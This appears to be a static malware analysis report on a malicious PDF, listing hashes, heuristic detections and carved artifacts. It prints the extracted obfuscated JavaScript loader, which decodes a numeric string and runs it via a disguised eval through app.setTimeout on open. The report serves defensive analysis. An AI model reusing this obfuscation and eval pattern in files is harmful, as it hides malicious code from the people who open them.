Malicious PDF — malware analysis report

Static analysis result for SHA-256 59751d1c0de82ce9…

MALICIOUS

PDF

37.4 KB
Created: 2010-04-12 20:38:29 +04:00
Authoring application: TCPDF (via TCPDF 4.8.032 (http://www.tcpdf.org))
First seen: 2026-05-10
MD5: 41f952a2eb197b16c4ac18cdc11044bb
SHA-1: 4ddd1208776afbc26048fd08e01384ed867b8c02
SHA-256: 59751d1c0de82ce9be9320ee1276b92e1e270c66c244f8184bec475a4429411a
Risk Score: 74

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 4

  • Suspicious extracted artifact (medium; rule EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action (low; 1 related finding; rule PDF_JAVASCRIPT)
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream (low; rule PDF_JS)
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Optional Content Group with action trigger (low; rule PDF_OPTIONAL_CONTENT)
    Optional Content Group (layer) co-occurs with an action trigger — content can be selectively hidden from viewers or scanners while the action still fires on open

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0010_000.js | pdf-javascript-stream | PDF /JS object 10 at offset 0x704A | 8330 bytes
SHA-256: 9b7c61307471861237a322d43fdc6c0de224eeb78514da8981cbbb19b2a832d6
First 1,000 lines of the extracted script
var kbyZwGaGJ = 140;
tqrhN0H = tqrhN0H.replace(/[^0-9]/g,':');
euAehUB6 = 'kbyZwGaGJ';
tqrhN0H = tqrhN0H.replace(/::/g,'');
app.alert(tqrhN0H);
function LfOmD2Jzs09H ( pqkT1skE9vIQ, MYwS5HzJ9MAh ) { var tNzN0 = new String();var bSRhnJWN6M = new String();
TwEEK = pqkT1skE9vIQ .split(':');
for(SWCyVmvm = 0; SWCyVmvm < TwEEK.length-1;SWCyVmvm++) { yB75Z6Rj= String['fromCharCode'](TwEEK[SWCyVmvm] - MYwS5HzJ9MAh);;
bSRhnJWN6M = bSRhnJWN6M + yB75Z6Rj;} return bSRhnJWN6M;};
euAehUB6 = LfOmD2Jzs09H(tqrhN0H,kbyZwGaGJ);
var UXcWlrq9 = 'a';
var M48uq3gC = 'u';
MFB4HrGWeWKX = app['set'+'TimeO' + M48uq3gC +'t']("ev"+UXcWlrq9+"l(euAehUB6)", 1);
stream_001_off0000704a.js | decompressed-pdf-stream | PDF FlateDecoded stream at offset 0x704A | 4164 bytes
SHA-256: 7a0f06cc6b4f756e1953d7d2cc33462acadfd0ad55540bfc750d8425132a5ae0
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). 10 of 19 identifiers look randomly generated (e.g. 'r257y250a239h256F245y251z250t172H240u241') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).